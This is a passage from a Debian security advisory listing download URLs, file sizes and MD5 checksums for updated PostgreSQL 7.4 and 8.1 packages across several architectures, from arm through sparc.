http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg5_8.1.19-0etch1_arm.deb\n Size/MD5 checksum: 207750 5eac3b23d8ab79dd5f9ff7b9773da7d4\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-plperl-8.1_8.1.19-0etch1_arm.deb\n Size/MD5 checksum: 203894 be5f83f199eb9350a785ef3d590bf0d3\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-contrib-7.4_7.4.27-0etch1_arm.deb\n Size/MD5 checksum: 585724 1ae2df2837597772a1b0be17230268d8\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpq4_8.1.19-0etch1_arm.deb\n Size/MD5 checksum: 291560 9b0afef10eb0e6e8c3babe3b5f6416f7\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-client-8.1_8.1.19-0etch1_arm.deb\n Size/MD5 checksum: 1447782 8a3ea0a856b14b790b15542abe5c181a\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-8.1_8.1.19-0etch1_arm.deb\n Size/MD5 checksum: 4315824 bc7e934d07b131b6aa7a061cf8dec0b7\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-server-dev-8.1_8.1.19-0etch1_arm.deb\n Size/MD5 checksum: 637376 40fc145dfb00e4fa6461368f0bf1ee2b\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-plperl-7.4_7.4.27-0etch1_arm.deb\n Size/MD5 checksum: 128404 f623428e23882a8c44944480842efe7c\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpq4_8.1.19-0etch1_hppa.deb\n Size/MD5 checksum: 304572 5449988b6f1964851867c539ab330935\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-pltcl-7.4_7.4.27-0etch1_hppa.deb\n Size/MD5 checksum: 136310 17c6807b10189d7725eb7e81c07ca7a3\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-contrib-8.1_8.1.19-0etch1_hppa.deb\n Size/MD5 checksum: 684004 f0e87155bed82b664737cc18efee9ad8\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpgtypes2_8.1.19-0etch1_hppa.deb\n Size/MD5 checksum: 217032 3aa1efea2149f53108f6605962f61bba\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-7.4_7.4.27-0etch1_hppa.deb\n Size/MD5 checksum: 3890058 a7562d82aad35c12a76c0bec3b3c170e\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpq-dev_8.1.19-0etch1_hppa.deb\n Size/MD5 checksum: 369394 9f656480ff1b12c948a5fb8a08e8866d\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-plperl-8.1_8.1.19-0etch1_hppa.deb\n Size/MD5 checksum: 208804 036f5f123a9c7aec955dba866f74625d\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg5_8.1.19-0etch1_hppa.deb\n Size/MD5 checksum: 212958 2b4d415748be404269cfc7aa22947601\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-contrib-7.4_7.4.27-0etch1_hppa.deb\n Size/MD5 checksum: 637300 b863e7e3124903a0415f655e7331bcf2\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-plperl-7.4_7.4.27-0etch1_hppa.deb\n Size/MD5 checksum: 131048 364fb778bc3e30852a9bcf4b77d0372b\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-plpython-7.4_7.4.27-0etch1_hppa.deb\n Size/MD5 checksum: 135824 c23e9ed7b62bc73211f80100adec12ae\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-client-7.4_7.4.27-0etch1_hppa.deb\n Size/MD5 checksum: 1176958 072efc7c4232340b4bda102efa6b707b\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg-dev_8.1.19-0etch1_hppa.deb\n Size/MD5 checksum: 391188 2d3129c860e278606f26ff16456d2b4e\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg-compat2_8.1.19-0etch1_hppa.deb\n Size/MD5 checksum: 191214 6ed8dbf535bef731d239e7f148ddc1a3\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-server-dev-8.1_8.1.19-0etch1_hppa.deb\n Size/MD5 checksum: 637226 21a7ff7e819ff6bf33fef73025551885\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-8.1_8.1.19-0etch1_hppa.deb\n Size/MD5 checksum: 4829174 c007d19fe771134f0889136cdd4fa987\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-plpython-8.1_8.1.19-0etch1_hppa.deb\n Size/MD5 checksum: 202380 a75e9d597a92ebf032c53058320589bf\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-pltcl-8.1_8.1.19-0etch1_hppa.deb\n Size/MD5 checksum: 202508 471d9a5dd6902fbe1e438cea3a095e33\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-client-8.1_8.1.19-0etch1_hppa.deb\n Size/MD5 checksum: 1520740 286681948ce15913b2f657d486bbdefa\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-plpython-7.4_7.4.27-0etch1_i386.deb\n Size/MD5 checksum: 131634 ac7e259c8b0de669ec429c51a9128dcd\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-client-8.1_8.1.19-0etch1_i386.deb\n Size/MD5 checksum: 1461532 df71d62f53e21de14be9387903954bfc\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-server-dev-8.1_8.1.19-0etch1_i386.deb\n Size/MD5 checksum: 636052 5bde112ff217639b066968ea1d88fe11\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-client-7.4_7.4.27-0etch1_i386.deb\n Size/MD5 checksum: 1117638 65b1a18c5ba96b369a192ed1cc3ddd19\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-8.1_8.1.19-0etch1_i386.deb\n Size/MD5 checksum: 4301750 35090ac594866140b8327bb8a635d77b\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-plperl-8.1_8.1.19-0etch1_i386.deb\n Size/MD5 checksum: 205886 cc5e76b3011c151b07c3a6419f1863f0\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpq4_8.1.19-0etch1_i386.deb\n Size/MD5 checksum: 298842 cf367d99c98cf398918b3cbf1a0a2e15\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-pltcl-7.4_7.4.27-0etch1_i386.deb\n Size/MD5 checksum: 133558 20b602d7613ecd793780c8a7b4e93159\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-plpython-8.1_8.1.19-0etch1_i386.deb\n Size/MD5 checksum: 198820 916c993c5ec43323fb29c21b93d65676\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-7.4_7.4.27-0etch1_i386.deb\n Size/MD5 checksum: 3403214 a0fe0a5e813a480f79be05be1383aad6\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-contrib-8.1_8.1.19-0etch1_i386.deb\n Size/MD5 checksum: 623632 e628b01b30342c27dd526a7aa199fe81\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-plperl-7.4_7.4.27-0etch1_i386.deb\n Size/MD5 checksum: 129400 62de3201b279c905be261c351ae2302a\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpgtypes2_8.1.19-0etch1_i386.deb\n Size/MD5 checksum: 211304 cf69ce66e565a882a8d4e657a49f2d67\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg-dev_8.1.19-0etch1_i386.deb\n Size/MD5 checksum: 377030 521dc1be7a37201d6621043854c359d6\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-contrib-7.4_7.4.27-0etch1_i386.deb\n Size/MD5 checksum: 575468 524ec95f1d8239a9807b80b724814a28\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpq-dev_8.1.19-0etch1_i386.deb\n Size/MD5 checksum: 358058 64dd0ab7b06d4e3bc370e29ad54e6682\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg-compat2_8.1.19-0etch1_i386.deb\n Size/MD5 checksum: 189288 8d7be7bd4b8958d2d28f2cead71faffa\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-pltcl-8.1_8.1.19-0etch1_i386.deb\n Size/MD5 checksum: 200274 984a18ace8b12e0fd783fd579e58d357\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg5_8.1.19-0etch1_i386.deb\n Size/MD5 checksum: 209634 cebfcc612b77a9cf896ff649b3053346\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg5_8.1.19-0etch1_ia64.deb\n Size/MD5 checksum: 222064 be430fa159aa99d7b0500de132974169\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-plpython-7.4_7.4.27-0etch1_ia64.deb\n Size/MD5 checksum: 141838 27d1f6dcf3f5aa4404a8f8a89d464d30\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-pltcl-7.4_7.4.27-0etch1_ia64.deb\n Size/MD5 checksum: 141504 072a8c4c441db866402395f0bc00f3f5\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg-compat2_8.1.19-0etch1_ia64.deb\n Size/MD5 checksum: 192742 497be82fae7349f7e9e3c0431883f51e\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpq-dev_8.1.19-0etch1_ia64.deb\n Size/MD5 checksum: 400666 3bbe96625d85513bb8217720ee9c896a\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-contrib-8.1_8.1.19-0etch1_ia64.deb\n Size/MD5 checksum: 795808 7bbb5f219e8a2faadc59eed0b7aba3dd\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-contrib-7.4_7.4.27-0etch1_ia64.deb\n Size/MD5 checksum: 721120 d1deed1029e1085bbe51955aebe0a035\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-plperl-8.1_8.1.19-0etch1_ia64.deb\n Size/MD5 checksum: 217704 c63bebb3f4ca719c7121d1f5ca40a279\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg-dev_8.1.19-0etch1_ia64.deb\n Size/MD5 checksum: 431224 924fb76d72887636428d715dacfdf488\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-client-7.4_7.4.27-0etch1_ia64.deb\n Size/MD5 checksum: 1262366 20888c94d413a66e4cf3c14f86b84c13\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-plperl-7.4_7.4.27-0etch1_ia64.deb\n Size/MD5 checksum: 133790 24031921129d1f75bce8e2209ce4fb2d\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-7.4_7.4.27-0etch1_ia64.deb\n Size/MD5 checksum: 3930582 adacad2f73ef2170cc3c8818d764fb5a\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpq4_8.1.19-0etch1_ia64.deb\n Size/MD5 checksum: 326596 6b821b8771855d8f8992ef864ceeb0a8\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-client-8.1_8.1.19-0etch1_ia64.deb\n Size/MD5 checksum: 1663530 93535ee9874ed2c6580a08cca48623a5\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-plpython-8.1_8.1.19-0etch1_ia64.deb\n Size/MD5 checksum: 210802 1564f0471eb0034e6641e388965e2d73\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-server-dev-8.1_8.1.19-0etch1_ia64.deb\n Size/MD5 checksum: 636510 4dc60efda98c9da13660251bd263ab97\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-pltcl-8.1_8.1.19-0etch1_ia64.deb\n Size/MD5 checksum: 208338 ff38ad3bbe3273b0f2f076e25207321b\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpgtypes2_8.1.19-0etch1_ia64.deb\n Size/MD5 checksum: 227980 df1908424b1ac06366b8014abc0febe0\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-8.1_8.1.19-0etch1_ia64.deb\n Size/MD5 checksum: 5129152 baae5d0903c3b372d04fcb828e714c21\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-7.4_7.4.27-0etch1_mips.deb\n Size/MD5 checksum: 3705738 04ada7ba0864b09709d86b1c20c7a3b7\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-contrib-8.1_8.1.19-0etch1_mips.deb\n Size/MD5 checksum: 634554 9f1daa7a1bc50141d619bd6eb0bb0416\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-plpython-8.1_8.1.19-0etch1_mips.deb\n Size/MD5 checksum: 199314 8cdec1ea5df86b34a199dc737a617110\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-pltcl-7.4_7.4.27-0etch1_mips.deb\n Size/MD5 checksum: 134178 8c71a1319b908ebab9cd8d636ae33cd4\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-plperl-7.4_7.4.27-0etch1_mips.deb\n Size/MD5 checksum: 127186 85fde99e0713e9be58658fbb52bce54f\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-client-8.1_8.1.19-0etch1_mips.deb\n Size/MD5 checksum: 1481714 edb8ef2a832cb098de870a141c828517\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpgtypes2_8.1.19-0etch1_mips.deb\n Size/MD5 checksum: 213544 9f5d91768c0fd2ede96ae88dcaf5a474\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg-dev_8.1.19-0etch1_mips.deb\n Size/MD5 checksum: 377378 33c5dfd063b9e96b14dd4b4e9904d901\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg-compat2_8.1.19-0etch1_mips.deb\n Size/MD5 checksum: 189472 69a603c697e3132d16edebc8925d290c\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-pltcl-8.1_8.1.19-0etch1_mips.deb\n Size/MD5 checksum: 200306 1c532ee685c26b1597d33cefc81a5a59\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg5_8.1.19-0etch1_mips.deb\n Size/MD5 checksum: 208618 b4a3290510887c617ad4835a29c88623\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-plperl-8.1_8.1.19-0etch1_mips.deb\n Size/MD5 checksum: 201864 d52f4a685bc4c8ec8ebd1e6d3bab3d12\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpq-dev_8.1.19-0etch1_mips.deb\n Size/MD5 checksum: 367622 085ab051b044532ec3da74ed21adae00\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-server-dev-8.1_8.1.19-0etch1_mips.deb\n Size/MD5 checksum: 636498 e60f0ca7182a9ccb23e43f3f5acbcf35\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-contrib-7.4_7.4.27-0etch1_mips.deb\n Size/MD5 checksum: 580756 ed26e3f61ed76889e3192389a465301a\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-client-7.4_7.4.27-0etch1_mips.deb\n Size/MD5 checksum: 1126966 eeabfbc6347a8693e5baeaedf6e58414\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-8.1_8.1.19-0etch1_mips.deb\n Size/MD5 checksum: 4637638 f09c6fa7d89502000b22eae8b1f94749\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-plpython-7.4_7.4.27-0etch1_mips.deb\n Size/MD5 checksum: 132944 0fe9c78c4a42ec8c8ede7f09083bc62d\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpq4_8.1.19-0etch1_mips.deb\n Size/MD5 checksum: 297636 c1ff957e831e8cb2d5f11906c3648cb1\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpq4_8.1.19-0etch1_mipsel.deb\n Size/MD5 checksum: 297824 efad72ec7e5f2f976ac2842af709ce55\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg-compat2_8.1.19-0etch1_mipsel.deb\n Size/MD5 checksum: 189472 4076d512818e63b19d60ac451dfcaf39\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-contrib-7.4_7.4.27-0etch1_mipsel.deb\n Size/MD5 checksum: 580360 4d79b7592b37131e222c0ed61dd6d9c8\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpq-dev_8.1.19-0etch1_mipsel.deb\n Size/MD5 checksum: 367902 7e12a1744fb5545b8300b84a3d4319e7\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-plperl-7.4_7.4.27-0etch1_mipsel.deb\n Size/MD5 checksum: 127122 13c5dfa2c178868aa29d2e7ca118c898\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-pltcl-8.1_8.1.19-0etch1_mipsel.deb\n Size/MD5 checksum: 200372 51e095c1350c0696d9f4eef2c8ffe4a6\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-client-8.1_8.1.19-0etch1_mipsel.deb\n Size/MD5 checksum: 1479770 deb0714f4377164a32b83fc2ab61997f\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-contrib-8.1_8.1.19-0etch1_mipsel.deb\n Size/MD5 checksum: 634346 912df6a0ae148e41cfcbd0419663893e\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-pltcl-7.4_7.4.27-0etch1_mipsel.deb\n Size/MD5 checksum: 134074 185c9c0c9b8864779df3c58f4f0bbbca\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-client-7.4_7.4.27-0etch1_mipsel.deb\n Size/MD5 checksum: 1126392 91abf23c6077f8830e0999ed6bfab452\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-plpython-7.4_7.4.27-0etch1_mipsel.deb\n Size/MD5 checksum: 133014 116ca5d0c22d3575b51caa52e52bd459\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpgtypes2_8.1.19-0etch1_mipsel.deb\n Size/MD5 checksum: 213648 061f8c622b3bed50543f3f154ccb4195\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg5_8.1.19-0etch1_mipsel.deb\n Size/MD5 checksum: 208654 d677573f1fc14996ee37d3d4b56eac27\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-8.1_8.1.19-0etch1_mipsel.deb\n Size/MD5 checksum: 4323924 d021dfced8d4ee3cbe1792c63d36fadb\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-plperl-8.1_8.1.19-0etch1_mipsel.deb\n Size/MD5 checksum: 201892 d3d268a6050e5560cea71c5e17b1531f\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-server-dev-8.1_8.1.19-0etch1_mipsel.deb\n Size/MD5 checksum: 636502 c2e21c0bc19e48f235e486e5b3ad518f\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-7.4_7.4.27-0etch1_mipsel.deb\n Size/MD5 checksum: 3395654 0cb537a89dfd3311225173afe4658dc5\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-plpython-8.1_8.1.19-0etch1_mipsel.deb\n Size/MD5 checksum: 199368 59f2d95497cab69085e6332550cea0a8\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg-dev_8.1.19-0etch1_mipsel.deb\n Size/MD5 checksum: 374986 4336c3e7f80fa9a01d2cdfb2ecc9d543\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-pltcl-8.1_8.1.19-0etch1_powerpc.deb\n Size/MD5 checksum: 201990 37e5f4a413cf2450b0b02ecfaea3f0f9\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-client-7.4_7.4.27-0etch1_powerpc.deb\n Size/MD5 checksum: 1139818 97955e7b85890c16053afd0a812091c9\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-8.1_8.1.19-0etch1_powerpc.deb\n Size/MD5 checksum: 4697822 26c333e62db31e83ca6fd6a6524e468f\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-server-dev-8.1_8.1.19-0etch1_powerpc.deb\n Size/MD5 checksum: 638424 fd804800216383a5f2f0d6718c2bd00f\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-client-8.1_8.1.19-0etch1_powerpc.deb\n Size/MD5 checksum: 1487994 134f48666b0c8d769ee12d0764740acd\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-contrib-8.1_8.1.19-0etch1_powerpc.deb\n Size/MD5 checksum: 677658 a209bdfca44324c9fbc2349ec06e7628\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpq4_8.1.19-0etch1_powerpc.deb\n Size/MD5 checksum: 301040 bed18d6e6aeacb05614129bdc9c6cd3b\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-plperl-8.1_8.1.19-0etch1_powerpc.deb\n Size/MD5 checksum: 206500 329927714459cf81495e9e09aa2fbbf5\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-contrib-7.4_7.4.27-0etch1_powerpc.deb\n Size/MD5 checksum: 633694 a933fea0b8b3dcecfb784f77cc9dc408\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg-dev_8.1.19-0etch1_powerpc.deb\n Size/MD5 checksum: 377178 58e8b40f135a407596d069948b3ff15d\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-plpython-8.1_8.1.19-0etch1_powerpc.deb\n Size/MD5 checksum: 200848 0dd49516fa2ddeee2472e8e5ba5b6dd4\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpgtypes2_8.1.19-0etch1_powerpc.deb\n Size/MD5 checksum: 214554 74b96aa6d810733eb538016f3536580f\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg5_8.1.19-0etch1_powerpc.deb\n Size/MD5 checksum: 211568 ba1a3aa88c40101a4489c307fe0067f6\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-plperl-7.4_7.4.27-0etch1_powerpc.deb\n Size/MD5 checksum: 130374 a6b9be64584b7a4be9b05a1ba6efbf7a\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-7.4_7.4.27-0etch1_powerpc.deb\n Size/MD5 checksum: 3773296 d2b6b114c08d0ae6a4ae57761710be02\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpq-dev_8.1.19-0etch1_powerpc.deb\n Size/MD5 checksum: 359060 e9ad8fd2a270d756aad1ebc3ee4e5157\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-pltcl-7.4_7.4.27-0etch1_powerpc.deb\n Size/MD5 checksum: 135634 0246bea143e4db28f83cf5df31739c5d\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg-compat2_8.1.19-0etch1_powerpc.deb\n Size/MD5 checksum: 190712 e7b3a1accc98e108d2de0a104d21fa3f\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-plpython-7.4_7.4.27-0etch1_powerpc.deb\n Size/MD5 checksum: 133708 7a97ee715cf8a23fa8d20073f89d7c79\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpq4_8.1.19-0etch1_s390.deb\n Size/MD5 checksum: 305136 a4e5e86eadde995e4f466a04260afbe3\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-8.1_8.1.19-0etch1_s390.deb\n Size/MD5 checksum: 4752988 47440422e258e60060e74fa0cfba8045\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-plpython-7.4_7.4.27-0etch1_s390.deb\n Size/MD5 checksum: 133424 86ddc67e3272ba78fa6a807ac61f68ce\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg-compat2_8.1.19-0etch1_s390.deb\n Size/MD5 checksum: 190152 f5f09c634ae60429b3126048b6c76332\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg-dev_8.1.19-0etch1_s390.deb\n Size/MD5 checksum: 377482 8a738ffeb0da2962e6ba405600a51ccc\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpgtypes2_8.1.19-0etch1_s390.deb\n Size/MD5 checksum: 214234 423d5ccdac153d1b485e67fbbe59b737\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg5_8.1.19-0etch1_s390.deb\n Size/MD5 checksum: 211534 b2ea78b40797f02c2c7675eba3cda750\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-contrib-7.4_7.4.27-0etch1_s390.deb\n Size/MD5 checksum: 615328 b2e7fa98e781967efb08fdb42ba1de28\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-plperl-7.4_7.4.27-0etch1_s390.deb\n Size/MD5 checksum: 128792 b76c564c9461a08897b932bc1bf2210b\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-client-7.4_7.4.27-0etch1_s390.deb\n Size/MD5 checksum: 1143508 50717a15d5c8736cb909befc68575409\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpq-dev_8.1.19-0etch1_s390.deb\n Size/MD5 checksum: 366230 18c3d124c4bd835b0b95aeca60b3e394\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-plpython-8.1_8.1.19-0etch1_s390.deb\n Size/MD5 checksum: 200988 20f739061201211f9a6c7b7eb3a971db\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-7.4_7.4.27-0etch1_s390.deb\n Size/MD5 checksum: 3822296 f7bf58f222eb945f79340fc46d5c11c8\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-client-8.1_8.1.19-0etch1_s390.deb\n Size/MD5 checksum: 1499798 0520a06ed3b27eef77aec54d06e4030e\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-pltcl-8.1_8.1.19-0etch1_s390.deb\n Size/MD5 checksum: 201150 169bc4e0f42344b90836ac83b02a1069\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-contrib-8.1_8.1.19-0etch1_s390.deb\n Size/MD5 checksum: 666128 cb25242029785a795c2642cd64d9a57c\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-server-dev-8.1_8.1.19-0etch1_s390.deb\n Size/MD5 checksum: 636530 d03c49c16a89170a89ab56e79c3fd64c\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-plperl-8.1_8.1.19-0etch1_s390.deb\n Size/MD5 checksum: 205052 94658d8a375dc674c1b99080c37f5b2e\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-pltcl-7.4_7.4.27-0etch1_s390.deb\n Size/MD5 checksum: 134138 aec19cb58ad7ec9eeb66b866de9badaa\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-plperl-7.4_7.4.27-0etch1_sparc.deb\n Size/MD5 checksum: 128860 8e05a33047766903da455dddaab16bfa\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpq4_8.1.19-0etch1_sparc.deb\n Size/MD5 checksum: 297178 c4e96241e2f39008fc575bd75802283f\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-7.4_7.4.27-0etch1_sparc.deb\n Size/MD5 checksum: 3699772 ce8ec7c98ca5a8a48a2d2aa95076ba9a\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-pltcl-8.1_8.1.19-0etch1_sparc.deb\n Size/MD5 checksum: 200272 6e28717aae8863e8bc0f0981ff9f7d62\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-server-dev-8.1_8.1.19-0etch1_sparc.deb\n Size/MD5 checksum: 637944 83000df4c900cc795810b10d87bd1fb3\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-contrib-8.1_8.1.19-0etch1_sparc.deb\n Size/MD5 checksum: 635678 168c857d230a24faeb114850cdb93c07\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpq-dev_8.1.19-0etch1_sparc.deb\n Size/MD5 checksum: 355620 08832615da490c0a3576059c9de7def3\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg-compat2_8.1.19-0etch1_sparc.deb\n Size/MD5 checksum: 188920 8dc243b802eb41f815d6f01861f6e286\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-pltcl-7.4_7.4.27-0etch1_sparc.deb\n Size/MD5 checksum: 134084 896764ec113c0778ccb6b54380aada82\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg-dev_8.1.19-0etch1_sparc.deb\n Size/MD5 checksum: 372622 481cea3ce04d544a9b56e977e1d922e0\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-plperl-8.1_8.1.19-0etch1_sparc.deb\n Size/MD5 checksum: 205364 b920892abf90492d391b21be50f2a4e3\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-8.1_8.1.19-0etch1_sparc.deb\n Size/MD5 checksum: 4626870 ed4a4cd6c1c7a14437ae5d1171ec0f1a\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpgtypes2_8.1.19-0etch1_sparc.deb\n Size/MD5 checksum: 209898 dbcfd68d23f0290697a749946270142b\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg5_8.1.19-0etch1_sparc.deb\n Size/MD5 checksum: 209286 